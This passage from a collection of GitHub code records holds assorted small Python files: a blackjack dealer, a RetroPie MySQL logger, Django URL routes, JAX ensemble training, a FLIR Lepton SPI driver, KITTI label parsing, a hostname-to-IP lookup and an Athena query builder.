{"seq_id":"22093880380","text":"\"\"\"\nImport the random module\n\"\"\"\nimport random\n\n\n\"\"\"\nPlayer 1 parameter setup\n\"\"\"\n\np1_card_list = []\np1_A_num = 0\np1_non_A_point = 0\np1_point = 0\n\n# Player 1's first card\np1_base_card1 = random.randint(1, 11)\nif p1_base_card1 == 11:\n p1_A_num += 1\n p1_card_list.append(\"A\")\nelse:\n p1_non_A_point += p1_base_card1\n p1_card_list.append(p1_base_card1)\n\n\n# Player 1's second card\np1_base_card2 = random.randint(1, 11)\nif p1_base_card2 == 11:\n p1_A_num += 1\n p1_card_list.append(\"A\")\nelse:\n 
p1_non_A_point += p1_base_card2\n p1_card_list.append(p1_base_card2)\nprint(p1_card_list)\n\n\nprint(p1_non_A_point)\nprint(p1_A_num)\n\n\"\"\"\nPlayer 2 parameter setup\n\"\"\"\n\np2_card_list = []\np2_A_num = 0\np2_non_A_point = 0\np2_point = 0\n\n# Player 2's first card\np2_base_card1 = random.randint(1, 11)\nif p2_base_card1 == 11:\n p2_A_num += 1\n p2_card_list.append(\"A\")\nelse:\n p2_non_A_point += p2_base_card1\n p2_card_list.append(p2_base_card1)\n\n\n# Player 2's second card\np2_base_card2 = random.randint(1, 11)\nif p2_base_card2 == 11:\n p2_A_num += 1\n p2_card_list.append(\"A\")\nelse:\n p2_non_A_point += p2_base_card2\n p2_card_list.append(p2_base_card2)\nprint(p2_card_list)\n\n\nprint(p2_non_A_point)\nprint(p2_A_num)\n\n\"\"\"\nPlayer 1 decision and input system\n\"\"\"","repo_name":"TanWaiHong/Story","sub_path":"Project/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73651202385","text":"import sys\nimport pymysql\nimport datetime\n\ngame_name = \"\"\n\nfor word in sys.argv:\n game_name = game_name + word\n\ngame_name_list = game_name.split('/')\ngame_name = game_name_list[len(game_name_list)-1]\ngame_name_list = game_name.split('.')\ngame_name = game_name_list[0]\n\n#game_name = sys.argv[2]\nsystem_name = sys.argv[1]\nsystem_list = system_name.split('/')\ncurrent_time = str(datetime.datetime.now().time())\n\nsystem_name = str(system_list[5])\n\nprint('game_name:', game_name)\nprint('system_name:', system_name)\nprint('current_time:', current_time)\n\nhost = 'localhost'\ndatabase = 'RetroPie'\nuser = 'root'\n\n# connects to the database\nconn = pymysql.connect(host=host, user=user, db=database)\nif conn:\n print('Connection to MySQL database', database, 'was successful!')\n\nval = input('Enter')\n\ncursor = conn.cursor()\ncursor2 = conn.cursor()\n# mysql statement\ncurrent_game_sql = 'INSERT INTO CurrentGame VALUES (%s, %s, %s)'\n\nin_history_sql = 'SELECT game_name FROM GamesPlayed'\n\n# execution statement\ncursor.execute(current_game_sql, (game_name, system_name, current_time))\n\nconn.commit()\n\ncursor2.execute(in_history_sql)\n# rows come back from the cursor as 1-tuples, so compare against the fetched tuples\nif (game_name,) not in cursor2.fetchall():\n game_history_sql = 'INSERT INTO GamesPlayed VALUES (%s, %s)'\n cursor.execute(game_history_sql, (game_name, system_name))\n conn.commit()\n\nprint('Bye!')\nconn.close()\n\n\n\n","repo_name":"stjpm09/retropie_flask_app","sub_path":"moveGameDataOnStartCopy.py","file_name":"moveGameDataOnStartCopy.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"841879640","text":"\"\"\"\nDefinition of urls for Purchasing_System.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.conf.urls import url, include\nimport django.contrib.auth.views\nfrom django.contrib import admin\n\nimport app.forms\nimport app.views\n\nimport PurchaseRequisition.views\nimport RequestForQuotation.views\nimport Quotation.views\nimport PurchaseOrder.views\nimport DeliveryOrder.views\nimport Invoice.views\n\n# Uncomment the next lines to enable the admin:\nfrom django.conf.urls import include\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = [\n # Examples:\n url(r'^$', app.views.home, name='home'),\n url(r'^contact$', app.views.contact, name='contact'),\n url(r'^about$', app.views.about, name='about'),\n url(r'^login/$',\n django.contrib.auth.views.login,\n {\n 'template_name': 'app/login.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n 
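 # 'extra_context' below passes extra template variables (title, year) through to login.html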
'extra_context':\n {\n 'title': 'Log in',\n 'year': datetime.now().year,\n }\n },\n name='login'),\n url(r'^logout$',\n django.contrib.auth.views.logout,\n {\n 'next_page': '/',\n },\n name='logout'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n url(r'^menu$', app.views.menu, name='menu'),\n\n #purchase requisition\n url(r'^purchaserequisitionform$', PurchaseRequisition.views.purchaserequisitionform, name=\"purchase_requisition_form\"),\n url(r'^purchaserequisitionconfirmation', PurchaseRequisition.views.purchaserequisitionconfirmation, name=\"confirm_purchase_requisition\"),\n url(r'^purchaserequisitiondetails', PurchaseRequisition.views.purchaserequisitiondetails, name=\"purchase_requisition_details\"),\n url(r'^purchaserequisitionhistorydetails', PurchaseRequisition.views.purchaserequisitionhistorydetails, name='purchase_requisition_history_details'),\n url(r'^purchaserequisitionhistory', PurchaseRequisition.views.purchaserequisitionhistory, name=\"purchase_requisition_history\"),\n\n #request for quotation\n url(r'^requestforquotationform$', RequestForQuotation.views.requestforquotationform, name=\"request_for_quotation_form\"),\n url(r'^fillingrequestforquotation', RequestForQuotation.views.fillingrequestforquotation, name=\"fill_request_for_quotation_form\"),\n url(r'^requestforquotationconfirmation', RequestForQuotation.views.requestforquotationconfirmation, name=\"confirm_request_for_quotation\"),\n url(r'^requestforquotationdetails', RequestForQuotation.views.requestforquotationdetails, name=\"request_for_quotation_details\"),\n url(r'^requestforquotationhistorydetails', RequestForQuotation.views.requestforquotationhistorydetails, name='request_for_quotation_history_details'),\n url(r'^requestforquotationhistory', RequestForQuotation.views.requestforquotationhistory, name=\"request_of_quotation_history\"),\n\n #quotation\n url(r'^quotationform$', Quotation.views.quotationform, name=\"quotation_form\"),\n url(r'^fillingquotation', Quotation.views.fillingquotation, name=\"fill_quotation_form\"),\n url(r'^quotationconfirmation', Quotation.views.quotationconfirmation, name=\"confirm_quotation\"),\n url(r'^quotationdetails', Quotation.views.quotationdetails, name=\"quotation_details\"),\n url(r'^quotationhistorydetails', Quotation.views.quotationhistorydetails, name='quotation_history_details'),\n url(r'^quotationhistory', Quotation.views.quotationhistory, name=\"quotation_history\"),\n\n #purchase order\n url(r'^purchaseorderform$', PurchaseOrder.views.purchaseorderform, name=\"purchase_order_form\"),\n url(r'^fillingpurchaseorder', PurchaseOrder.views.fillingpurchaseorder, name=\"fill_purchase_order_form\"),\n url(r'^purchaseorderconfirmation', PurchaseOrder.views.purchaseorderconfirmation, name=\"confirm_purchase_order\"),\n url(r'^purchaseorderdetails', PurchaseOrder.views.purchaseorderdetails, name=\"purchase_order_details\"),\n url(r'^purchaseorderhistorydetails', PurchaseOrder.views.purchaseorderhistorydetails, name='purchase_order_history_details'),\n url(r'^purchaseorderhistory', PurchaseOrder.views.purchaseorderhistory, name=\"purchase_order_history\"),\n\n #delivery order\n url(r'^deliveryorderform$', DeliveryOrder.views.deliveryorderform, name=\"delivery_order_form\"),\n url(r'^fillingdeliveryorder', DeliveryOrder.views.fillingdeliveryorder, name=\"fill_delivery_order_form\"),\n 
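 # NOTE: these regexes are not end-anchored, so Django matches by prefix; keep the more specific '...historydetails' routes above their '...history' counterparts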
url(r'^deliveryorderconfirmation', DeliveryOrder.views.deliveryorderconfirmation, name=\"confirm_delivery_order\"),\n url(r'^deliveryorderdetails', DeliveryOrder.views.deliveryorderdetails, name=\"delivery_order_details\"),\n url(r'^deliveryorderhistorydetails', DeliveryOrder.views.deliveryorderhistorydetails, name='delivery_order_history_details'),\n url(r'^deliveryorderhistory', DeliveryOrder.views.deliveryorderhistory, name=\"delivery_order_history\"),\n\n #Invoice\n url(r'^invoiceform$', Invoice.views.invoiceform, name=\"invoiceform\"),\n url(r'^fillinginvoice', Invoice.views.fillinginvoice, name=\"fill_invoice_form\"),\n url(r'^invoiceconfirmation', Invoice.views.invoiceconfirmation, name=\"confirm_invoice\"),\n url(r'^invoicedetails', Invoice.views.invoicedetails, name=\"invoice_details\"),\n url(r'^invoicehistorydetails', Invoice.views.invoicehistorydetails, name='invoice_history_details'),\n url(r'^invoicehistory', Invoice.views.invoicehistory, name=\"invoice_history\"),\n]\n\nhandler404 = \"page_not_found\"\n","repo_name":"MoHamEdy92/Group-08-Purchasing-System","sub_path":"Purchasing System/Purchasing_System/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"21022265014","text":"try:\n import jax_pod_setup\nexcept ModuleNotFoundError:\n import os\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ''\n os.environ[\"XLA_FLAGS\"] = '--xla_force_host_platform_device_count=8'\n\nimport jax\nimport util as u\nimport sys\nimport optax\nfrom tqdm import tqdm\nfrom jax.tree_util import tree_map, tree_multimap\nimport jax.numpy as jnp\nfrom jax.lax import psum\nfrom jax import vmap, value_and_grad, pmap, jit\nimport models\nimport data\nimport pickle\nimport wandb\nimport logging\n\n\ndef softmax_cross_entropy(logits, labels):\n one_hot = jax.nn.one_hot(\n labels, logits.shape[-1])\n return -jnp.sum(jax.nn.log_softmax(logits) * one_hot, axis=-1)\n\n\ndef train(opts):\n\n run = u.DTS()\n logging.info(\"starting run %s\", run)\n\n # # init w & b\n wandb_enabled = opts.group is not None\n if wandb_enabled and u.primary_host():\n wandb.init(project='ensemble_net', group=opts.group, name=run,\n reinit=True)\n # save group again explicitly to work around sync bug that drops\n # group when 'wandb off'\n wandb.config.group = opts.group\n wandb.config.seed = opts.seed\n wandb.config.max_conv_size = opts.max_conv_size\n wandb.config.dense_kernel_size = opts.dense_kernel_size\n wandb.config.models_per_device = opts.models_per_device\n wandb.config.learning_rate = opts.learning_rate\n wandb.config.batch_size = opts.batch_size\n wandb.config.steps_per_batch = opts.steps_per_batch\n else:\n logging.info(\"not using wandb and/or not primary host\")\n\n logging.info(\"build_model\")\n model = models.build_model(opts)\n\n num_devices = len(jax.local_devices())\n num_models = num_devices * opts.models_per_device\n\n # we make two rngs; one that is distinct per host and one\n # that will be common across the pod\n host_rng = jax.random.PRNGKey(opts.seed ^ jax.host_id())\n pod_rng = jax.random.PRNGKey(opts.seed * 2) # o_O\n\n logging.info(\"init models\")\n keys = jax.random.split(host_rng, num_models)\n logging.debug(\"model keys %s\" % list(keys))\n representative_input = jnp.zeros((1, 64, 64, 3))\n params = vmap(lambda k: model.init(k, representative_input))(keys)\n\n logging.info(\"init optimisers\")\n opt = optax.adam(opts.learning_rate)\n opt_states = vmap(opt.init)(params)\n\n def 
reshape_for_devices_and_shard(p):\n return u.shard(u.reshape_leading_axis(p, (num_devices,\n opts.models_per_device)))\n\n logging.info(\"treemap reshape params\")\n params = tree_map(reshape_for_devices_and_shard, params)\n opt_states = tree_map(reshape_for_devices_and_shard, opt_states)\n\n # -----------------------------------\n # prepare loss / training functions\n\n def mean_ensemble_xent(params, x, y_true):\n logits = model.apply(params, x)\n logits = psum(logits, axis_name='device')\n return jnp.mean(softmax_cross_entropy(logits, y_true))\n\n def update(params, opt_state, sub_model_idx, x, y_true):\n # select the sub model & corresponding optimiser state to use\n sub_params = tree_map(lambda v: v[sub_model_idx], params)\n sub_opt_state = tree_map(lambda v: v[sub_model_idx], opt_state)\n # calculate loss and gradients; summing logits over all selected models\n losses, grads = value_and_grad(\n mean_ensemble_xent)(sub_params, x, y_true)\n # apply optimiser\n updates, sub_opt_state = opt.update(grads, sub_opt_state)\n sub_params = optax.apply_updates(sub_params, updates)\n\n # assign updated values back into params and optimiser state\n def update_sub_model(values, update_value):\n return jax.ops.index_update(values, sub_model_idx, update_value)\n params = tree_multimap(update_sub_model, params, sub_params)\n opt_state = tree_multimap(update_sub_model, opt_state, sub_opt_state)\n # return\n return params, opt_state, losses\n\n logging.info(\"compile pmap update\")\n p_update = pmap(update,\n in_axes=(0, 0, 0, 0, 0),\n axis_name='device')\n\n # -----------------------------------\n # prepare evaluation functions\n\n # plumb batch dimension for models_per_device\n all_models_apply = vmap(model.apply, in_axes=(0, None))\n # plumb batch dimension for num_devices\n all_models_apply = vmap(all_models_apply, in_axes=(0, None))\n\n def ensemble_logits(params, imgs):\n logits = all_models_apply(params, imgs)\n batch_size = logits.shape[-2] # since last batch may be smaller\n num_classes = 10\n logits = logits.reshape((-1, batch_size, num_classes)) # (M, B, 10)\n ensemble_logits = jnp.sum(logits, axis=0) # (B, 10)\n return ensemble_logits\n\n @jit\n def total_ensemble_xent_loss(params, x, y_true):\n y_pred_logits = ensemble_logits(params, x)\n return jnp.sum(softmax_cross_entropy(y_pred_logits, y_true))\n\n # --------------------------------\n # run training loop\n\n for epoch in range(opts.epochs):\n\n # train for one epoch\n logging.info(\"data.training_dataset: epoch %d\", epoch)\n\n total_training_loss = 0\n training_num_examples = 0\n\n # split out a new shuffle seed for this epoch common\n # across pod\n pod_rng, shuffle_seed = jax.random.split(pod_rng)\n\n # create dataset\n train_ds = data.training_dataset(batch_size=opts.batch_size,\n shuffle_seed=shuffle_seed[0],\n num_inputs=1,\n sample_data=opts.sample_data)\n\n for imgs, labels in train_ds:\n\n logging.debug(\"labels %s\" % labels)\n\n # replicate batch across M devices\n # (M, B, H, W, 3)\n imgs = u.replicate(imgs, replicas=num_devices)\n labels = u.replicate(labels, replicas=num_devices) # (M, B)\n\n # run across all the 4 rotations\n # for k in range(4):\n # rotated_imgs = rot90_imgs(imgs, k)\n\n # run some steps for this set, each with a different set of\n # dropout idxs\n for _ in range(opts.steps_per_batch):\n host_rng, dropout_key = jax.random.split(host_rng)\n logging.debug(\"dropout_key %s\" % dropout_key[0])\n sub_model_idxs = jax.random.randint(dropout_key, minval=0,\n maxval=opts.models_per_device,\n 
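 # one random sub-model index per device; this training step then updates only those ensemble members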
shape=(num_devices,))\n logging.debug(\"sub_model_idxs %s\" % sub_model_idxs)\n params, opt_states, losses = p_update(params, opt_states,\n sub_model_idxs,\n imgs, labels)\n logging.debug(\"losses %s\" % losses)\n\n total_training_loss += jnp.sum(losses)\n training_num_examples += len(losses)\n\n mean_training_loss = float(total_training_loss / training_num_examples)\n logging.info(\"mean training loss %f\", mean_training_loss)\n\n # post epoch stats collection and housekeeping on primary host only\n if u.primary_host():\n # checkpoint model\n ckpt_file = f\"saved_models/{run}/ckpt_{epoch:04d}\"\n u.ensure_dir_exists_for_file(ckpt_file)\n with open(ckpt_file, \"wb\") as f:\n pickle.dump(params, f)\n\n # run validation\n total_validation_loss = 0\n validation_num_examples = 0\n validation_data = data.validation_dataset(\n batch_size=opts.batch_size,\n sample_data=opts.sample_data)\n for imgs, labels in validation_data:\n total_validation_loss += total_ensemble_xent_loss(params, imgs,\n labels)\n validation_num_examples += len(labels)\n mean_validation_loss = float(\n total_validation_loss / validation_num_examples)\n logging.info(\"mean validation loss %f\", mean_validation_loss)\n\n if wandb_enabled:\n wandb.log({'training_loss': mean_training_loss}, step=epoch)\n wandb.log({'validation_loss': mean_validation_loss}, step=epoch)\n\n # close out wandb run\n if u.primary_host():\n if wandb_enabled:\n wandb.log({'final_validation_loss': mean_validation_loss},\n step=opts.epochs)\n wandb.join()\n else:\n logging.info(\"finished %s final validation_loss %f\" %\n (run, mean_validation_loss))\n # return validation loss to ax\n return mean_validation_loss\n else:\n return None\n\n\nif __name__ == '__main__':\n\n # import jax.profiler\n # server = jax.profiler.start_server(9999)\n # print(\"PROFILER STARTED\")\n # import time\n # for i in reversed(range(5)):\n # print(i)\n # time.sleep(1)\n\n import argparse\n import sys\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--group', type=str,\n help='w&b init group', default=None)\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--max-conv-size', type=int, default=256)\n parser.add_argument('--dense-kernel-size', type=int, default=32)\n parser.add_argument('--models-per-device', type=int, default=2)\n parser.add_argument('--learning-rate', type=float, default=1e-3)\n parser.add_argument('--batch-size', type=int, default=32)\n parser.add_argument('--steps-per-batch', type=int, default=4,\n help='how many steps to run, each with new random'\n ' dropout, per batch that is loaded')\n parser.add_argument('--epochs', type=int, default=2)\n parser.add_argument('--log-level', type=str, default='INFO')\n parser.add_argument('--sample-data', action='store_true',\n help='set for running test with small training data')\n opts = parser.parse_args()\n print(opts, file=sys.stderr)\n\n # set logging level\n numeric_level = getattr(logging, opts.log_level.upper(), None)\n if not isinstance(numeric_level, int):\n raise ValueError('Invalid log level: %s' % opts.log_level)\n logging.basicConfig(format='%(asctime)s %(message)s')\n logging.getLogger().setLevel(numeric_level) # logging.INFO)\n\n train(opts)\n","repo_name":"matpalm/ensemble_net","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10595,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"24968145464","text":"#!/usr/bin/env 
python\n\nimport numpy as np\nimport ctypes\nimport struct\n\nfrom ioctl_numbers import _IOR, _IOW\nfrom fcntl import ioctl\n\nSPI_IOC_MAGIC = ord(\"k\")\n\nSPI_IOC_RD_MODE = _IOR(SPI_IOC_MAGIC, 1, \"=B\")\nSPI_IOC_WR_MODE = _IOW(SPI_IOC_MAGIC, 1, \"=B\")\n\nSPI_IOC_RD_LSB_FIRST = _IOR(SPI_IOC_MAGIC, 2, \"=B\")\nSPI_IOC_WR_LSB_FIRST = _IOW(SPI_IOC_MAGIC, 2, \"=B\")\n\nSPI_IOC_RD_BITS_PER_WORD = _IOR(SPI_IOC_MAGIC, 3, \"=B\")\nSPI_IOC_WR_BITS_PER_WORD = _IOW(SPI_IOC_MAGIC, 3, \"=B\")\n\nSPI_IOC_RD_MAX_SPEED_HZ = _IOR(SPI_IOC_MAGIC, 4, \"=I\")\nSPI_IOC_WR_MAX_SPEED_HZ = _IOW(SPI_IOC_MAGIC, 4, \"=I\")\n\nclass Lepton(object):\n \"\"\"Communication class for FLIR Lepton module on SPI\n\n Args:\n spi_dev (str): Location of SPI device node. Default '/dev/spidev0.0'.\n \"\"\"\n\n ROWS = 60\n COLS = 80\n VOSPI_FRAME_SIZE = COLS + 2\n VOSPI_FRAME_SIZE_BYTES = VOSPI_FRAME_SIZE * 2\n MODE = 0\n BITS = 8\n SPEED = 18000000\n\n def __init__(self, spi_dev = \"/dev/spidev0.0\"):\n self.__spi_dev = spi_dev\n self.__txbuf = np.zeros(Lepton.VOSPI_FRAME_SIZE, dtype=np.uint16)\n\n # struct spi_ioc_transfer {\n # __u64 tx_buf;\n # __u64 rx_buf;\n # __u32 len;\n # __u32 speed_hz;\n # __u16 delay_usecs;\n # __u8 bits_per_word;\n # __u8 cs_change;\n # __u8 tx_nbits;\n # __u8 rx_nbits;\n # __u16 pad;\n # };\n self.__xmit_struct = struct.Struct(\"=QQIIHBBBBH\")\n self.__xmit_buf = ctypes.create_string_buffer(self.__xmit_struct.size)\n self.__msg = _IOW(SPI_IOC_MAGIC, 0, self.__xmit_struct.format)\n self.__capture_buf = np.zeros((60, 82, 1), dtype=np.uint16)\n\n def __enter__(self):\n self.__handle = open(self.__spi_dev, \"w+\")\n\n ioctl(self.__handle, SPI_IOC_RD_MODE, struct.pack(\"=B\", Lepton.MODE))\n ioctl(self.__handle, SPI_IOC_WR_MODE, struct.pack(\"=B\", Lepton.MODE))\n\n ioctl(self.__handle, SPI_IOC_RD_BITS_PER_WORD, struct.pack(\"=B\", Lepton.BITS))\n ioctl(self.__handle, SPI_IOC_WR_BITS_PER_WORD, struct.pack(\"=B\", Lepton.BITS))\n\n ioctl(self.__handle, SPI_IOC_RD_MAX_SPEED_HZ, struct.pack(\"=I\", Lepton.SPEED))\n ioctl(self.__handle, SPI_IOC_WR_MAX_SPEED_HZ, struct.pack(\"=I\", Lepton.SPEED))\n\n return self\n\n def __exit__(self, type, value, tb):\n self.__handle.close()\n\n def capture(self, data_buffer = None):\n \"\"\"Capture a frame of data.\n\n Captures 80x60 uint16 array of non-normalized (raw 12-bit) data. Returns that frame and a frame_id (which\n is currently just the sum of all pixels). The Lepton will return multiple, identical frames at a rate of up\n to ~27 Hz, with unique frames at only ~9 Hz, so the frame_id can help you from doing additional work\n processing duplicate frames.\n\n Args:\n data_buffer (numpy.ndarray): Optional. 
If specified, should be ``(60,80,1)`` with `dtype`=``numpy.uint16``.\n\n Returns:\n tuple consisting of (data_buffer, frame_id)\n \"\"\"\n\n if data_buffer is None:\n data_buffer = np.ndarray((Lepton.ROWS, Lepton.COLS, 1), dtype=np.uint16)\n elif data_buffer.ndim < 2 or data_buffer.shape[0] < Lepton.ROWS or data_buffer.shape[1] < Lepton.COLS or data_buffer.itemsize < 2:\n raise Exception(\"Provided input array not large enough\")\n\n rxs = self.__capture_buf.ctypes.data\n rxs_end = rxs + Lepton.ROWS * Lepton.VOSPI_FRAME_SIZE_BYTES\n txs = self.__txbuf.ctypes.data\n synced = False\n while rxs < rxs_end:\n self.__xmit_struct.pack_into(self.__xmit_buf, 0, txs, rxs, Lepton.VOSPI_FRAME_SIZE_BYTES, Lepton.SPEED, 0, Lepton.BITS, 0, Lepton.BITS, Lepton.BITS, 0)\n ioctl(self.__handle, self.__msg, self.__xmit_buf)\n if synced or self.__capture_buf[0,0] & 0x0f00 != 0x0f00:\n synced = True\n rxs += Lepton.VOSPI_FRAME_SIZE_BYTES\n\n data_buffer[0:Lepton.ROWS,0:Lepton.COLS] = self.__capture_buf[0:Lepton.ROWS,2:Lepton.VOSPI_FRAME_SIZE]\n data_buffer.byteswap(True)\n\n # TODO: turn on telemetry to get real frame id, sum on this array is fast enough though (< 500us)\n return data_buffer, data_buffer.sum()\n","repo_name":"uomphoenix/overwatch","sub_path":"pylepton/Lepton.py","file_name":"Lepton.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14446734936","text":"# -*- coding: utf-8 -*-\n\"\"\"Example of start HSessionPool and run multiple task async\nAuthor : Maajor\nEmail : info@ma-yidong.com\n\"\"\"\nimport logging\nimport asyncio\nimport pyhapi as ph\n\n@ph.HSessionTask\nasync def session_task(session : ph.HSession, index1, index2):\n print(\"execute {0} - {1}\".format(index1, index2))\n hda_asset = ph.HAsset(session, \"hda/save_cube.hda\")\n asset_node = hda_asset.instantiate(node_name=\"cube\")\n asset_node.set_param_value(\"filename\", \"{0}-{1}\".format(index1, index2))\n await asset_node.press_button_async(\"execute\", status_report_interval=0.1)\n\ndef main():\n \"\"\"Main\n \"\"\"\n logging.basicConfig(level=logging.INFO)\n\n session_pool = ph.HSessionManager.get_or_create_session_pool()\n \n for i in range(2):\n for j in range(2):\n session_pool.enqueue_task(session_task, i, j)\n \n # run all task by now and close\n session_pool.run_all_tasks()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maajor/pyhapi","sub_path":"examples/multisession_run.py","file_name":"multisession_run.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"48"} +{"seq_id":"20108178811","text":"import numpy as np\n\n\n\"\"\"\n#Values Name Description\n----------------------------------------------------------------------------\n 1 frame Frame within the sequence where the object appearers\n 1 track id Unique tracking id of this object within this sequence\n 1 type Describes the type of object: 'Car', 'Van', 'Truck',\n 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram',\n 'Misc' or 'DontCare'\n 1 truncated Integer (0,1,2) indicating the level of truncation.\n Note that this is in contrast to the object detection\n benchmark where truncation is a float in [0,1].\n 1 occluded Integer (0,1,2,3) indicating occlusion state:\n 0 = fully visible, 1 = partly occluded\n 2 = largely occluded, 3 = unknown\n 1 alpha Observation angle of object, ranging [-pi..pi]\n 4 bbox 2D bounding box of object in the image (0-based index):\n contains 
left, top, right, bottom pixel coordinates\n 3 dimensions 3D object dimensions: height, width, length (in meters)\n 3 location 3D object location x,y,z in camera coordinates (in meters)\n 1 rotation_y Rotation ry around Y-axis in camera coordinates [-pi..pi]\n 1 score Only for results: Float, indicating confidence in\n detection, needed for p/r curves, higher is better.\n\"\"\"\n\n\ndef get_objects_from_label(label_file):\n with open(label_file, 'r') as f:\n lines = f.readlines()\n objects = [Track3d(line) for line in lines]\n return objects\n\n\ndef cls_type_to_id(cls_type):\n type_to_id = {'Car': 1, 'Pedestrian': 2, 'Cyclist': 3, 'Van': 4}\n if cls_type not in type_to_id.keys():\n return -1\n return type_to_id[cls_type]\n\n\nclass Track3d(object):\n def __init__(self, line):\n label = line.strip().split(' ')\n self.src = line\n self.frame_id = label[0]\n self.track_id = label[1]\n self.cls_type = label[2]\n self.cls_id = cls_type_to_id(self.cls_type)\n\n self.truncation = float(label[3])\n self.occlusion = float(label[4]) # 0:fully visible 1:partly occluded 2:largely occluded 3:unknown\n self.alpha = float(label[5])\n self.box2d = np.array((float(label[6]), float(label[7]), float(label[8]), float(label[9])), dtype=np.float32)\n self.h = float(label[10])\n self.w = float(label[11])\n self.l = float(label[12])\n self.loc = np.array((float(label[13]), float(label[14]), float(label[15])), dtype=np.float32)\n self.dis_to_cam = np.linalg.norm(self.loc)\n self.ry = float(label[16])\n\n def generate_corners3d(self):\n \"\"\"\n generate corners3d representation for this object\n :return corners_3d: (8, 3) corners of box3d in camera coord\n \"\"\"\n l, h, w = self.l, self.h, self.w\n x_corners = [l / 2, l / 2, -l / 2, -l / 2, l / 2, l / 2, -l / 2, -l / 2]\n y_corners = [0, 0, 0, 0, -h, -h, -h, -h]\n z_corners = [w / 2, -w / 2, -w / 2, w / 2, w / 2, -w / 2, -w / 2, w / 2]\n\n R = np.array([[np.cos(self.ry), 0, np.sin(self.ry)],\n [0, 1, 0],\n [-np.sin(self.ry), 0, np.cos(self.ry)]])\n corners3d = np.vstack([x_corners, y_corners, z_corners]) # (3, 8)\n corners3d = np.dot(R, corners3d).T\n corners3d = corners3d + self.loc\n return corners3d\n\n def to_str(self):\n print_str = '%s %.3f %.3f %.3f box2d: %s hwl: [%.3f %.3f %.3f] pos: %s ry: %.3f' \\\n % (self.cls_type, self.truncation, self.occlusion, self.alpha, self.box2d, self.h, self.w, self.l,\n self.loc, self.ry)\n return print_str\n\n def to_kitti_format(self):\n kitti_str = '%s %.2f %d %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f' \\\n % (self.cls_type, self.truncation, int(self.occlusion), self.alpha, self.box2d[0], self.box2d[1],\n self.box2d[2], self.box2d[3], self.h, self.w, self.l, self.loc[0], self.loc[1], self.loc[2],\n self.ry)\n return kitti_str\n","repo_name":"shanjiayao/PTT","sub_path":"ptt/utils/track3d_kitti.py","file_name":"track3d_kitti.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"48"} +{"seq_id":"13018097453","text":"# Simple IP discloser for URL by Sean Lewis\r\n# Uses Python's socket library\r\n\r\nimport socket\r\nhost = socket.gethostname()\r\nip = socket.gethostbyname(host)\r\nprint(\"Personal Host Name is:\", host)\r\nprint(\"Personal IP Address is:\", ip)\r\nurl = \"github.com\"\r\nwhile url != \"\":\r\n url = input(\"Enter the website address: \")\r\n try:\r\n print(f\"The IP address of {url} is: {socket.gethostbyname(url)}\")\r\n except:\r\n print(\"Please enter a valid URL 
address\")","repo_name":"seanhlewis/url-ip-discloser","sub_path":"url-ip-discloser.py","file_name":"url-ip-discloser.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41023047167","text":"def readInput(path=\"input.txt\"):\r\n f = open(path, \"r\")\r\n lines = f.readlines()\r\n\r\n piece_type = int(lines[0])\r\n\r\n previous_board = [[int(x) for x in line.rstrip('\\n')]\r\n for line in lines[1:6]]\r\n\r\n board = [[int(x) for x in line.rstrip('\\n')]\r\n for line in lines[6: 12]]\r\n\r\n f.close()\r\n\r\n return piece_type, previous_board, board","repo_name":"Rohit-Putcha/USC-CSCI-561-Artificial-Intelligence","sub_path":"Assignment 2/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33282800964","text":"class GameConfig:\n def __init__(self, start_game=False, black=False, white=False,\n load_game=False, game_file=None, timer=False, duration=None):\n self.start_game = start_game\n self.black = black\n self.white = white\n self.load_game = load_game\n self.game_file = game_file\n self.timer = timer\n self.duration = duration\n","repo_name":"Apollon76/checkers","sub_path":"src/gameconfig.py","file_name":"gameconfig.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71201524306","text":"import sys\nimport pandas as pd\nfrom utils import Athena_Query\nfrom utils import S3, LabelStore\nimport boto3\nimport datetime\nfrom datetime import datetime, timedelta, date\n\nclass VitalSignExtractor:\n def __init__(self):\n self.athena = Athena_Query()\n \n def get_vitalsign_query(self, patient_ids, parameter_ids):\n patient_ids_string = \"(\" + \",\".join([f\"'{id}'\" for id in patient_ids]) + \")\"\n parameter_ids_string = \"(\" + \",\".join([str(id) for id in parameter_ids]) + \")\"\n\n query = f\"\"\"\n SELECT time, value, parameterid\n FROM metavision_deid_dtm.signals\n WHERE parameterid IN {parameter_ids_string} AND patientid IN {patient_ids_string}\n 